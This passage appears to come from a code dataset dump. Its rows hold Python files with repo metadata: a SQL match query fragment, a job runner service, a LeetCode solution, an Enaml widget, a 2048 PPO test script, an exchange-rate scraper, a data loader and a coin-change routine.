difficulties.name as difficulty, game_types.name as type, matches.type_id, map_reveal_choices.name as map_reveal_choice, map_sizes.name as map_size, speeds.name as speed, starting_ages.name as starting_age, starting_resources.name as starting_resources, victory_conditions.name as victory_condition, played, rated, diplomacy_type, team_size, platform_match_id, cheats, population_limit, lock_teams, mirror, dataset_version, postgame, has_playback, duration::interval(0), versions.name as version, extract(epoch from duration)::integer as duration_secs, winning_team_id, game_version, save_version, build, rms_seed, rms_custom, direct_placement, fixed_positions, guard_state, effect_quantity, added from matches join versions on matches.version_id=versions.id join datasets on matches.dataset_id=datasets.id join difficulties on matches.difficulty_id=difficulties.id join game_types on matches.type_id=game_types.id join map_reveal_choices on matches.map_reveal_choice_id=map_reveal_choices.id join map_sizes on matches.map_size_id=map_sizes.id join speeds on matches.speed_id=speeds.id left join platforms on matches.platform_id=platforms.id left join starting_ages on matches.starting_age_id=starting_ages.id left join starting_resources on matches.starting_resources_id=starting_resources.id left join victory_conditions on matches.victory_condition_id=victory_conditions.id left join ladders on matches.ladder_id=ladders.id and matches.platform_id=ladders.platform_id left join events on matches.event_id=events.id left join tournaments on matches.tournament_id=tournaments.id left join series_metadata on matches.series_id=series_metadata.series_id where matches.id=any(:id) | 2.516911 | 3 |
App/service/job.py | dataminion/ScienceManager | 0 | 6612443 | <filename>App/service/job.py
#service.job
from service.data.provider import Provider as dataSource
from service.process.provider import Provider as Process
class Job(object):
""" A service to execute external applications """
def __init__(self, log, conn):
self._log = log
self._source = dataSource(self._log, conn)
def get_job_details(self, workflow, name):
return self._source.get_program_details(workflow, name)
def register_job(self, workflow_id, user_id):
return self._source.reserve_next_batch_number(workflow_id, user_id)
def setup_job(self, workflow_id):
return self._source.get_program_actions(workflow_id)
def process_job_items(self, tasks):
for task in tasks:
proc = Process(self._log, task.action.type)
proc.handle_process(task.action.text)
pass
| <filename>App/service/job.py
#service.job
from service.data.provider import Provider as dataSource
from service.process.provider import Provider as Process
class Job(object):
""" A service to execute external applications """
def __init__(self, log, conn):
self._log = log
self._source = dataSource(self._log, conn)
def get_job_details(self, workflow, name):
return self._source.get_program_details(workflow, name)
def register_job(self, workflow_id, user_id):
return self._source.reserve_next_batch_number(workflow_id, user_id)
def setup_job(self, workflow_id):
return self._source.get_program_actions(workflow_id)
def process_job_items(self, tasks):
for task in tasks:
proc = Process(self._log, task.action.type)
proc.handle_process(task.action.text)
pass
| en | 0.739755 | #service.job A service to execute external applications | 2.771868 | 3 |
Longest Consecutive Sequence.py | TommyWongww/killingCodes | 1 | 6612444 | # @Time : 2019/6/1 23:31
# @Author : shakespere
# @FileName: Longest Consecutive Sequence.py
'''
128. Longest Consecutive Sequence
Hard
Given an unsorted array of integers, find the length of the longest consecutive elements sequence.
Your algorithm should run in O(n) complexity.
Example:
Input: [100, 4, 200, 1, 3, 2]
Output: 4
Explanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.
'''
class Solution(object):
def longestConsecutive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
dict = {x: False for x in nums}
maxlen = 0
for i in dict:
if dict[i] == False:
cur, lenright = i + 1, 0
while cur in dict:
dict[cur] = True
cur += 1
lenright += 1
cur, lenleft = i - 1, 0
while cur in dict:
dict[cur] = True
cur -= 1
lenleft += 1
maxlen = max(maxlen, lenright + 1 + lenleft)
return maxlen
| # @Time : 2019/6/1 23:31
# @Author : shakespere
# @FileName: Longest Consecutive Sequence.py
'''
128. Longest Consecutive Sequence
Hard
Given an unsorted array of integers, find the length of the longest consecutive elements sequence.
Your algorithm should run in O(n) complexity.
Example:
Input: [100, 4, 200, 1, 3, 2]
Output: 4
Explanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.
'''
class Solution(object):
def longestConsecutive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
dict = {x: False for x in nums}
maxlen = 0
for i in dict:
if dict[i] == False:
cur, lenright = i + 1, 0
while cur in dict:
dict[cur] = True
cur += 1
lenright += 1
cur, lenleft = i - 1, 0
while cur in dict:
dict[cur] = True
cur -= 1
lenleft += 1
maxlen = max(maxlen, lenright + 1 + lenleft)
return maxlen
| en | 0.783118 | # @Time : 2019/6/1 23:31 # @Author : shakespere # @FileName: Longest Consecutive Sequence.py 128. Longest Consecutive Sequence
Hard
Given an unsorted array of integers, find the length of the longest consecutive elements sequence.
Your algorithm should run in O(n) complexity.
Example:
Input: [100, 4, 200, 1, 3, 2]
Output: 4
Explanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4. :type nums: List[int]
:rtype: int | 4.005896 | 4 |
enaml/widgets/focus_tracker.py | timgates42/enaml | 26 | 6612445 | #------------------------------------------------------------------------------
# Copyright (c) 2014, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import ForwardTyped, Typed
from enaml.core.declarative import d_
from .toolkit_object import ToolkitObject, ProxyToolkitObject
from .widget import Widget
class ProxyFocusTracker(ProxyToolkitObject):
""" The abstract definition of a proxy FocusTracker object.
"""
#: A reference to the FocusTracker declaration.
declaration = ForwardTyped(lambda: FocusTracker)
class FocusTracker(ToolkitObject):
""" An object which tracks the global application focus widget.
"""
#: The application widget with the current input focus. This will
#: be None if no widget in the application has focus, or if the
#: focused widget does not directly correspond to an Enaml widget.
focused_widget = d_(Typed(Widget), writable=False)
#: A reference to the ProxyFocusTracker object.
proxy = Typed(ProxyFocusTracker)
| #------------------------------------------------------------------------------
# Copyright (c) 2014, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import ForwardTyped, Typed
from enaml.core.declarative import d_
from .toolkit_object import ToolkitObject, ProxyToolkitObject
from .widget import Widget
class ProxyFocusTracker(ProxyToolkitObject):
""" The abstract definition of a proxy FocusTracker object.
"""
#: A reference to the FocusTracker declaration.
declaration = ForwardTyped(lambda: FocusTracker)
class FocusTracker(ToolkitObject):
""" An object which tracks the global application focus widget.
"""
#: The application widget with the current input focus. This will
#: be None if no widget in the application has focus, or if the
#: focused widget does not directly correspond to an Enaml widget.
focused_widget = d_(Typed(Widget), writable=False)
#: A reference to the ProxyFocusTracker object.
proxy = Typed(ProxyFocusTracker)
| en | 0.709818 | #------------------------------------------------------------------------------ # Copyright (c) 2014, Nucleic Development Team. # # Distributed under the terms of the Modified BSD License. # # The full license is in the file COPYING.txt, distributed with this software. #------------------------------------------------------------------------------ The abstract definition of a proxy FocusTracker object. #: A reference to the FocusTracker declaration. An object which tracks the global application focus widget. #: The application widget with the current input focus. This will #: be None if no widget in the application has focus, or if the #: focused widget does not directly correspond to an Enaml widget. #: A reference to the ProxyFocusTracker object. | 1.9787 | 2 |
PPO/Test.py | hojunkim13/master2048 | 0 | 6612446 | from Agent import Agent
import numpy as np
import os, sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from Env import Game2048_wrapper
from _2048 import Game2048
import pygame
p1 = os.path.join("save", '2048_.score')
p2 = os.path.join("save", '2048_.%d.state')
screen = pygame.display.set_mode((Game2048.WIDTH, Game2048.HEIGHT))
pygame.init()
pygame.display.set_caption("2048!")
pygame.display.set_icon(Game2048.icon(32))
env_name = '2048'
env = Game2048_wrapper(screen, p1, p2)
state_dim = (1,4,4)
action_dim = 4
n_episode = 250
load = False
save_freq = 10
gamma = 0.99
lmbda = 0.95
alpha = 5e-4
beta = 5e-4
time_step = 20
K_epochs = 3
epsilon = 0.1
agent = Agent(state_dim, action_dim, alpha, beta, gamma, lmbda, epsilon, time_step, K_epochs)
agent.actor.eval()
agent.critic.eval()
agent.load(env_name)
if __name__ == "__main__":
score_list = []
mas_list = []
for e in range(n_episode):
done = False
score = 0
state = env.reset(True)
while not done:
env.draw()
action, prob = agent.get_action(state)
state_, reward, done = env.step(action)
score += reward
state = state_
#done
score_list.append(score)
average_score = np.mean(score_list[-100:])
mas_list.append(average_score)
print(f'[{e+1}/{n_episode}] [Score: {score:.1f}] [Average Score: {average_score:.1f}]')
env.close()
| from Agent import Agent
import numpy as np
import os, sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from Env import Game2048_wrapper
from _2048 import Game2048
import pygame
p1 = os.path.join("save", '2048_.score')
p2 = os.path.join("save", '2048_.%d.state')
screen = pygame.display.set_mode((Game2048.WIDTH, Game2048.HEIGHT))
pygame.init()
pygame.display.set_caption("2048!")
pygame.display.set_icon(Game2048.icon(32))
env_name = '2048'
env = Game2048_wrapper(screen, p1, p2)
state_dim = (1,4,4)
action_dim = 4
n_episode = 250
load = False
save_freq = 10
gamma = 0.99
lmbda = 0.95
alpha = 5e-4
beta = 5e-4
time_step = 20
K_epochs = 3
epsilon = 0.1
agent = Agent(state_dim, action_dim, alpha, beta, gamma, lmbda, epsilon, time_step, K_epochs)
agent.actor.eval()
agent.critic.eval()
agent.load(env_name)
if __name__ == "__main__":
score_list = []
mas_list = []
for e in range(n_episode):
done = False
score = 0
state = env.reset(True)
while not done:
env.draw()
action, prob = agent.get_action(state)
state_, reward, done = env.step(action)
score += reward
state = state_
#done
score_list.append(score)
average_score = np.mean(score_list[-100:])
mas_list.append(average_score)
print(f'[{e+1}/{n_episode}] [Score: {score:.1f}] [Average Score: {average_score:.1f}]')
env.close()
| none | 1 | 2.384148 | 2 | |
webEuroDollar.py | Dauphine-demo/exo1-powa | 0 | 6612447 | # -*- coding: utf-8 -*-
"""
<NAME>
Ceci est un script qui permet de faire un peu
de web scraping.
"""
import bs4
import requests
# Récupérer la page web
url = 'http://www.boursorama.com/taux-de-change-euro-dollar-eur-usd'
maRequete = requests.get(url)
if( maRequete.status_code != 200 ):
print("Erreur lors de la récupération. Code d'erreur :", maRequete.status_code)
exit(1)
print(maRequete.url)
# Le contenu de la page est dans maRequete.text
# Analyser la page web avec BS4
soupe = bs4.BeautifulSoup(maRequete.text, "lxml")
soupe2 = soupe.find('div', attrs={'id': 'fiche_cours_details'})
conversion = soupe2.find('table').find('tr').findAll('td')[1].find('b').find('span').text
# Afficher la valeur de la conversion Euro/Dollar
print(conversion)
| # -*- coding: utf-8 -*-
"""
<NAME>
Ceci est un script qui permet de faire un peu
de web scraping.
"""
import bs4
import requests
# Récupérer la page web
url = 'http://www.boursorama.com/taux-de-change-euro-dollar-eur-usd'
maRequete = requests.get(url)
if( maRequete.status_code != 200 ):
print("Erreur lors de la récupération. Code d'erreur :", maRequete.status_code)
exit(1)
print(maRequete.url)
# Le contenu de la page est dans maRequete.text
# Analyser la page web avec BS4
soupe = bs4.BeautifulSoup(maRequete.text, "lxml")
soupe2 = soupe.find('div', attrs={'id': 'fiche_cours_details'})
conversion = soupe2.find('table').find('tr').findAll('td')[1].find('b').find('span').text
# Afficher la valeur de la conversion Euro/Dollar
print(conversion)
| fr | 0.934111 | # -*- coding: utf-8 -*- <NAME>
Ceci est un script qui permet de faire un peu
de web scraping. # Récupérer la page web # Le contenu de la page est dans maRequete.text # Analyser la page web avec BS4 # Afficher la valeur de la conversion Euro/Dollar | 3.182513 | 3 |
experiment/loaders/cropmapping.py | LeonDong1993/TractableDE-ContCNet | 0 | 6612448 | import numpy as np
from utmLib import utils
from pdb import set_trace
def load_data(options):
print('Loading crop mapping data .....')
data_file = '{}/{}'.format(options.root_dir, options.data_path)
# read_data
data = np.loadtxt(data_file, delimiter= ',', dtype = 'float')
useless_attr = [172, 126, 134, 164, 170, 171, 133, 163, 125, 132, 162, 167, 169, 98, 124, 166, 168, 128, 129, 131, 100, 99, 101, 161,130, 158, 159, 120]
selector = utils.notin(range(data.shape[1]), useless_attr)
data = data[:,selector]
high_corr_elim = [1, 3, 131, 132, 6, 5, 137, 141, 142, 15, 16, 17, 34, 36, 39, 43, 44, 53, 54, 55, 61, 75, 86, 87, 92, 94, 100, 102, 103]
selector = utils.notin(range(data.shape[1]), high_corr_elim)
data = data[:,selector]
return data | import numpy as np
from utmLib import utils
from pdb import set_trace
def load_data(options):
print('Loading crop mapping data .....')
data_file = '{}/{}'.format(options.root_dir, options.data_path)
# read_data
data = np.loadtxt(data_file, delimiter= ',', dtype = 'float')
useless_attr = [172, 126, 134, 164, 170, 171, 133, 163, 125, 132, 162, 167, 169, 98, 124, 166, 168, 128, 129, 131, 100, 99, 101, 161,130, 158, 159, 120]
selector = utils.notin(range(data.shape[1]), useless_attr)
data = data[:,selector]
high_corr_elim = [1, 3, 131, 132, 6, 5, 137, 141, 142, 15, 16, 17, 34, 36, 39, 43, 44, 53, 54, 55, 61, 75, 86, 87, 92, 94, 100, 102, 103]
selector = utils.notin(range(data.shape[1]), high_corr_elim)
data = data[:,selector]
return data | en | 0.294442 | # read_data | 2.471071 | 2 |
src/importance_evaluation/feat_imp_mnist.py | mjpekala/shearlet-scattering | 2 | 6612449 | # <NAME>, ETH Zurich, 2016
import feat_importance_extractor as fe
num_directions = 3
num_scales = [3, 3, 3, 0]
img_sizes = [28*28, 28*28, 14*14, 7*7]
rffile = 'rfmnist.pkl'
outname = 'mnist_featimp'
rf = fe.load_pkl(rffile)
fe.unmap_feat_vec_csv(rf,outname,num_directions,num_scales,img_sizes)
img_sizes = [36*36, 36*36, 18*18, 9*9]
rffile = 'rfmnistdisp.pkl'
outname = 'mnist_disp_featimp'
rf = fe.load_pkl(rffile)
fe.unmap_feat_vec_csv(rf,outname,num_directions,num_scales,img_sizes)
| # <NAME>, ETH Zurich, 2016
import feat_importance_extractor as fe
num_directions = 3
num_scales = [3, 3, 3, 0]
img_sizes = [28*28, 28*28, 14*14, 7*7]
rffile = 'rfmnist.pkl'
outname = 'mnist_featimp'
rf = fe.load_pkl(rffile)
fe.unmap_feat_vec_csv(rf,outname,num_directions,num_scales,img_sizes)
img_sizes = [36*36, 36*36, 18*18, 9*9]
rffile = 'rfmnistdisp.pkl'
outname = 'mnist_disp_featimp'
rf = fe.load_pkl(rffile)
fe.unmap_feat_vec_csv(rf,outname,num_directions,num_scales,img_sizes)
| en | 0.462854 | # <NAME>, ETH Zurich, 2016 | 1.916767 | 2 |
kerasy/search/smart_pay.py | iwasakishuto/Keras-Imitation | 4 | 6612450 | <gh_stars>1-10
# coding: utf-8
from ..utils import flush_progress_bar
def breakdown(combs):
""" display breakdowns """
use_coins = sorted(set(combs))
num_coins = [combs.count(coin) for coin in use_coins]
total_pay = [n*coin for n,coin in zip(use_coins,num_coins)]
width_coin = max([len(str(e)) for e in use_coins]+[len("coins")])
width_num = max([len(str(e)) for e in num_coins]+[len("number")])
width_total = max([len(str(e)) for e in total_pay]+[len("pay"),len(str(sum(total_pay)))])
width_line = width_coin+width_num+width_total+2
print_func = lambda c,n,p: print(f"{c:^{width_coin}}|{n:>{width_num}}|{p:>{width_total}}")
print_func('coins','number','pay')
print("="*width_line)
for coin,num,t in zip(use_coins,num_coins,total_pay):
print_func(coin,num,t)
print("-"*width_line)
print_func('total',sum(num_coins),sum(total_pay))
def smart_pay(coins, total, limit=None, verbose=1, retval=False):
"""
Find the minimum number of coin combinations by using Dynamic Programming.
@params coins: (int list) Coins.
@params total: (int) Amount of Payment.
@params limit: (int) Maximum number of times a restricted coin can be used.
"""
total += 1 # because 0-origin.
if len(set(coins)) < len(coins):
raise ValueError("All elements of `coins` must be different integers.")
restricted = coins[0]
free_coins = coins[1:]
if limit is None:
limit = total//restricted+1
elif verbose:
print(f'{restricted} coin can only be used up to {limit} times at the same time.')
# Initialization.
B = [0 for _ in range(total)] # Memory for Traceback.
m = [0 if t==0 else 1 if t in free_coins else float('inf') for t in range(total)]
# Recursion
for t in range(1,total):
cands = [m[t-coin] if (t-coin)>=0 else float('inf') for coin in free_coins]
if not sum([e!=float('inf') for e in cands])==0:
minnum = min(cands)
m[t],B[t] = [(e+1,t-coin) for e,coin in zip(cands,free_coins) if e==minnum][0]
flush_progress_bar(t-1, total-1, metrics={"minimum": m[t]}, verbose=verbose)
ms = [(l,m[-1-restricted*l]+l) for l in range(limit+1) if restricted*l<=total]
num_restricted, num_total = min(ms, key=lambda x:x[1])
idx = total-1-restricted*num_restricted
combs = [restricted for _ in range(num_restricted)]
while idx:
last = B[idx]
combs.append(idx-last)
idx = last
if retval:
return combs
else:
breakdown(combs)
| # coding: utf-8
from ..utils import flush_progress_bar
def breakdown(combs):
""" display breakdowns """
use_coins = sorted(set(combs))
num_coins = [combs.count(coin) for coin in use_coins]
total_pay = [n*coin for n,coin in zip(use_coins,num_coins)]
width_coin = max([len(str(e)) for e in use_coins]+[len("coins")])
width_num = max([len(str(e)) for e in num_coins]+[len("number")])
width_total = max([len(str(e)) for e in total_pay]+[len("pay"),len(str(sum(total_pay)))])
width_line = width_coin+width_num+width_total+2
print_func = lambda c,n,p: print(f"{c:^{width_coin}}|{n:>{width_num}}|{p:>{width_total}}")
print_func('coins','number','pay')
print("="*width_line)
for coin,num,t in zip(use_coins,num_coins,total_pay):
print_func(coin,num,t)
print("-"*width_line)
print_func('total',sum(num_coins),sum(total_pay))
def smart_pay(coins, total, limit=None, verbose=1, retval=False):
"""
Find the minimum number of coin combinations by using Dynamic Programming.
@params coins: (int list) Coins.
@params total: (int) Amount of Payment.
@params limit: (int) Maximum number of times a restricted coin can be used.
"""
total += 1 # because 0-origin.
if len(set(coins)) < len(coins):
raise ValueError("All elements of `coins` must be different integers.")
restricted = coins[0]
free_coins = coins[1:]
if limit is None:
limit = total//restricted+1
elif verbose:
print(f'{restricted} coin can only be used up to {limit} times at the same time.')
# Initialization.
B = [0 for _ in range(total)] # Memory for Traceback.
m = [0 if t==0 else 1 if t in free_coins else float('inf') for t in range(total)]
# Recursion
for t in range(1,total):
cands = [m[t-coin] if (t-coin)>=0 else float('inf') for coin in free_coins]
if not sum([e!=float('inf') for e in cands])==0:
minnum = min(cands)
m[t],B[t] = [(e+1,t-coin) for e,coin in zip(cands,free_coins) if e==minnum][0]
flush_progress_bar(t-1, total-1, metrics={"minimum": m[t]}, verbose=verbose)
ms = [(l,m[-1-restricted*l]+l) for l in range(limit+1) if restricted*l<=total]
num_restricted, num_total = min(ms, key=lambda x:x[1])
idx = total-1-restricted*num_restricted
combs = [restricted for _ in range(num_restricted)]
while idx:
last = B[idx]
combs.append(idx-last)
idx = last
if retval:
return combs
else:
breakdown(combs) | en | 0.731843 | # coding: utf-8 display breakdowns Find the minimum number of coin combinations by using Dynamic Programming. @params coins: (int list) Coins. @params total: (int) Amount of Payment. @params limit: (int) Maximum number of times a restricted coin can be used. # because 0-origin. # Initialization. # Memory for Traceback. # Recursion | 3.593122 | 4 |